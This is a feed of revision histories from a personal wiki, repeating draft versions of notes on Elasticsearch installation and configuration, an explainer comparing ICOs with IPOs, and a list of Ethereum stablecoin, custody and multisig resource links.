elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
$ https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
$ https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1100</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1100"/>
		<updated>2021-10-27T14:24:53Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
# https://artifacts.elastic.co/downloads&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1099</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1099"/>
		<updated>2021-10-27T14:21:56Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
abc&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1098</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1098"/>
		<updated>2021-10-27T14:20:33Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* ElasticSearch Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1097</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1097"/>
		<updated>2021-10-27T14:14:33Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=ICO&amp;diff=1096</id>
		<title>ICO</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=ICO&amp;diff=1096"/>
		<updated>2021-06-03T23:53:05Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource: https://www.youtube.com/watch?v=cxgvsPCDhRY **&lt;br /&gt;
&lt;br /&gt;
An initial coin offering( ICO ) is similar in concept to an initial public offering (IPO), both a process in which companies raise capital, while an ICO is an investment that gives the investor a cryptocoin, more commonly known as a coin or a token in return for investment, which is quite different to the issuance of securities as is the case in an IPO investment.&lt;br /&gt;
&lt;br /&gt;
=Some key characteristics of an ICO include:=&lt;br /&gt;
&lt;br /&gt;
* Participation in a project, Decentralized Autonomous Organization (DAO) or an economy.&lt;br /&gt;
* Coin ICOs generally sell participation in an economy, while token ICOs sell a right of ownership or royalties to a project or DAO.&lt;br /&gt;
* Owning tokens do not always give the investor a right to vote on the direction of a project or DAO, with the rights of the investor embedded within the structure of the ICO, though generally the investor will have input throughout a project lifespan.&lt;br /&gt;
The majority of ICOs involve the creation of a defined number of coins or tokens prior to sale.&lt;br /&gt;
* ICO prices are usually established by the creators of the economy, project or DAO.&lt;br /&gt;
* ICOs may have multiple rounds of fund raising, with coins or tokens on offer, increasing in value until the release date, with early investors likely to have greater rewards embedded within their tokens as an incentive.&lt;br /&gt;
* ICOs conclude once the coins or tokens are tradable in the open market.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=If we were to compare the key features of ICOs and IPOs, some of the similarities and differences would be as follows:=&lt;br /&gt;
* An IPO gives you ownership of the company based on the number of shares acquired, whilst an ICO may only give you rights of a particular project, not the company launching the project.&lt;br /&gt;
* Decision making in IPO companies are centralized with the CEO and the board involved in the day to day running of the business, whilst with ICO companies/projects, decision making is decentralized, giving the investor a material decision making position.&lt;br /&gt;
* Financial data is released as per the rules of the exchange on which the IPO took place, whilst for ICOs, these will either be public by way of the blockchain or as outlined within the white paper and agreement with the investors.&lt;br /&gt;
* Companies launched by way of an IPO must pay taxes, with investors having to pay capital gains tax, whilst for ICOs, the company may not be subject to direct tax, only the investor being required to pay capital gains tax.&lt;br /&gt;
* An IPO is a onetime sale with multiple intermediaries involved in the process of determining the conditions, pricing, etc., whilst ICOs can have multiple rounds of fund raising, with few if any intermediaries, the white paper the blueprint.&lt;br /&gt;
* And finally, stock exchanges and companies listed by IPO are heavily regulated, whilst the exchanges on which ICOs are launched are quite the opposite.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=For companies raising capital through ICOs, the advantages include:=&lt;br /&gt;
* The project, DAO or economy is not necessarily subject to direct taxation, which in contrast to companies fund raising through IPOs.&lt;br /&gt;
* Sales of coins or tokens are direct, including multiple rounds, with few if any intermediaries required in the process, investors basing investment decisions on the content of white papers prepared by the fund raising entity.&lt;br /&gt;
&lt;br /&gt;
While ICOs are to mainly raise capital for a start up, they are also used to kick-start the sale of a service to be taken to market or the use of a new cryptocurrency.&lt;br /&gt;
&lt;br /&gt;
resource: https://www.fxempire.com/education/article/ico-initial-coin-offering-work-418446&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1095</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1095"/>
		<updated>2021-06-01T00:18:41Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
* [https://ethereum.org/en/developers/docs/standards/tokens/erc-20/ ERC20]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;br /&gt;
== OpenZeppelin ==&lt;br /&gt;
* https://docs.openzeppelin.com/openzeppelin/&lt;br /&gt;
&lt;br /&gt;
==Gnosis==&lt;br /&gt;
&lt;br /&gt;
* https://gnosis-safe.io/&lt;br /&gt;
* https://rinkeby.gnosis-safe.io/app/#/welcome  #testnet - rinkeby&lt;br /&gt;
* to create an App for the Gnosis Safe : https://github.com/gnosis/safe-apps-sdk/tree/master/packages/cra-template-safe-app&lt;br /&gt;
** https://docs.gnosis.io/safe/docs/sdks_safe_apps/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==BitGo==&lt;br /&gt;
Institutional digital asset custody, trading, and finance&lt;br /&gt;
* https://www.bitgo.com/&lt;br /&gt;
* https://api.bitgo.com/docs/&lt;br /&gt;
* https://bitgo.github.io/bitgo-docs/&lt;br /&gt;
* https://www.npmjs.com/package/bitgo&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Useful Resources =&lt;br /&gt;
* [[ICO]] vs [[IPO]]&lt;br /&gt;
* https://awesomeopensource.com/projects/truffle&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=ICO&amp;diff=1094</id>
		<title>ICO</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=ICO&amp;diff=1094"/>
		<updated>2021-06-01T00:16:45Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
An initial coin offering( ICO ) is similar in concept to an initial public offering (IPO), both a process in which companies raise capital, while an ICO is an investment that gives the investor a cryptocoin, more commonly known as a coin or a token in return for investment, which is quite different to the issuance of securities as is the case in an IPO investment.&lt;br /&gt;
&lt;br /&gt;
=Some key characteristics of an ICO include:=&lt;br /&gt;
&lt;br /&gt;
* Participation in a project, Decentralized Autonomous Organization (DAO) or an economy.&lt;br /&gt;
* Coin ICOs generally sell participation in an economy, while token ICOs sell a right of ownership or royalties to a project or DAO.&lt;br /&gt;
* Owning tokens do not always give the investor a right to vote on the direction of a project or DAO, with the rights of the investor embedded within the structure of the ICO, though generally the investor will have input throughout a project lifespan.&lt;br /&gt;
The majority of ICOs involve the creation of a defined number of coins or tokens prior to sale.&lt;br /&gt;
* ICO prices are usually established by the creators of the economy, project or DAO.&lt;br /&gt;
* ICOs may have multiple rounds of fund raising, with coins or tokens on offer, increasing in value until the release date, with early investors likely to have greater rewards embedded within their tokens as an incentive.&lt;br /&gt;
* ICOs conclude once the coins or tokens are tradable in the open market.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=If we were to compare the key features of ICOs and IPOs, some of the similarities and differences would be as follows:=&lt;br /&gt;
* An IPO gives you ownership of the company based on the number of shares acquired, whilst an ICO may only give you rights of a particular project, not the company launching the project.&lt;br /&gt;
* Decision making in IPO companies are centralized with the CEO and the board involved in the day to day running of the business, whilst with ICO companies/projects, decision making is decentralized, giving the investor a material decision making position.&lt;br /&gt;
* Financial data is released as per the rules of the exchange on which the IPO took place, whilst for ICOs, these will either be public by way of the blockchain or as outlined within the white paper and agreement with the investors.&lt;br /&gt;
* Companies launched by way of an IPO must pay taxes, with investors having to pay capital gains tax, whilst for ICOs, the company may not be subject to direct tax, only the investor being required to pay capital gains tax.&lt;br /&gt;
* An IPO is a onetime sale with multiple intermediaries involved in the process of determining the conditions, pricing, etc., whilst ICOs can have multiple rounds of fund raising, with few if any intermediaries, the white paper the blueprint.&lt;br /&gt;
* And finally, stock exchanges and companies listed by IPO are heavily regulated, whilst the exchanges on which ICOs are launched are quite the opposite.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=For companies raising capital through ICOs, the advantages include:=&lt;br /&gt;
* The project, DAO or economy is not necessarily subject to direct taxation, which in contrast to companies fund raising through IPOs.&lt;br /&gt;
* Sales of coins or tokens are direct, including multiple rounds, with few if any intermediaries required in the process, investors basing investment decisions on the content of white papers prepared by the fund raising entity.&lt;br /&gt;
&lt;br /&gt;
While ICOs are to mainly raise capital for a start up, they are also used to kick-start the sale of a service to be taken to market or the use of a new cryptocurrency.&lt;br /&gt;
&lt;br /&gt;
resource: https://www.fxempire.com/education/article/ico-initial-coin-offering-work-418446&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=ICO&amp;diff=1093</id>
		<title>ICO</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=ICO&amp;diff=1093"/>
		<updated>2021-05-31T23:26:18Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: Created page with &amp;quot;An initial coin offering( ICO ) is similar in concept to an initial public offering (IPO), both a process in which companies raise capital, while an ICO is an investment that...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;An initial coin offering( ICO ) is similar in concept to an initial public offering (IPO), both a process in which companies raise capital, while an ICO is an investment that gives the investor a cryptocoin, more commonly known as a coin or a token in return for investment, which is quite different to the issuance of securities as is the case in an IPO investment.&lt;br /&gt;
&lt;br /&gt;
=Some key characteristics of an ICO include:=&lt;br /&gt;
&lt;br /&gt;
* Participation in a project, Decentralized Autonomous Organization (DAO) or an economy.&lt;br /&gt;
* Coin ICOs generally sell participation in an economy, while token ICOs sell a right of ownership or royalties to a project or DAO.&lt;br /&gt;
* Owning tokens do not always give the investor a right to vote on the direction of a project or DAO, with the rights of the investor embedded within the structure of the ICO, though generally the investor will have input throughout a project lifespan.&lt;br /&gt;
The majority of ICOs involve the creation of a defined number of coins or tokens prior to sale.&lt;br /&gt;
* ICO prices are usually established by the creators of the economy, project or DAO.&lt;br /&gt;
* ICOs may have multiple rounds of fund raising, with coins or tokens on offer, increasing in value until the release date, with early investors likely to have greater rewards embedded within their tokens as an incentive.&lt;br /&gt;
* ICOs conclude once the coins or tokens are tradable in the open market.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=If we were to compare the key features of ICOs and IPOs, some of the similarities and differences would be as follows:=&lt;br /&gt;
* An IPO gives you ownership of the company based on the number of shares acquired, whilst an ICO may only give you rights of a particular project, not the company launching the project.&lt;br /&gt;
* Decision making in IPO companies are centralized with the CEO and the board involved in the day to day running of the business, whilst with ICO companies/projects, decision making is decentralized, giving the investor a material decision making position.&lt;br /&gt;
* Financial data is released as per the rules of the exchange on which the IPO took place, whilst for ICOs, these will either be public by way of the blockchain or as outlined within the white paper and agreement with the investors.&lt;br /&gt;
* Companies launched by way of an IPO must pay taxes, with investors having to pay capital gains tax, whilst for ICOs, the company may not be subject to direct tax, only the investor being required to pay capital gains tax.&lt;br /&gt;
* An IPO is a onetime sale with multiple intermediaries involved in the process of determining the conditions, pricing, etc., whilst ICOs can have multiple rounds of fund raising, with few if any intermediaries, the white paper the blueprint.&lt;br /&gt;
* And finally, stock exchanges and companies listed by IPO are heavily regulated, whilst the exchanges on which ICOs are launched are quite the opposite.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=For companies raising capital through ICOs, the advantages include:=&lt;br /&gt;
* The project, DAO or economy is not necessarily subject to direct taxation, which in contrast to companies fund raising through IPOs.&lt;br /&gt;
* Sales of coins or tokens are direct, including multiple rounds, with few if any intermediaries required in the process, investors basing investment decisions on the content of white papers prepared by the fund raising entity.&lt;br /&gt;
&lt;br /&gt;
While ICOs are to mainly raise capital for a start up, they are also used to kick-start the sale of a service to be taken to market or the use of a new cryptocurrency.&lt;br /&gt;
&lt;br /&gt;
resource: https://www.fxempire.com/education/article/ico-initial-coin-offering-work-418446&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1092</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1092"/>
		<updated>2021-05-31T23:11:00Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;br /&gt;
== OpenZeppelin ==&lt;br /&gt;
* https://docs.openzeppelin.com/openzeppelin/&lt;br /&gt;
&lt;br /&gt;
==Gnosis==&lt;br /&gt;
&lt;br /&gt;
* https://gnosis-safe.io/&lt;br /&gt;
* https://rinkeby.gnosis-safe.io/app/#/welcome  #testnet - rinkeby&lt;br /&gt;
* to create an App for the Gnosis Safe : https://github.com/gnosis/safe-apps-sdk/tree/master/packages/cra-template-safe-app&lt;br /&gt;
** https://docs.gnosis.io/safe/docs/sdks_safe_apps/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==BitGo==&lt;br /&gt;
Institutional digital asset custody, trading, and finance&lt;br /&gt;
* https://www.bitgo.com/&lt;br /&gt;
* https://api.bitgo.com/docs/&lt;br /&gt;
* https://bitgo.github.io/bitgo-docs/&lt;br /&gt;
* https://www.npmjs.com/package/bitgo&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Useful Resources =&lt;br /&gt;
* [[ICO]] vs [[IPO]]&lt;br /&gt;
* https://awesomeopensource.com/projects/truffle&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1091</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1091"/>
		<updated>2021-05-31T22:14:05Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
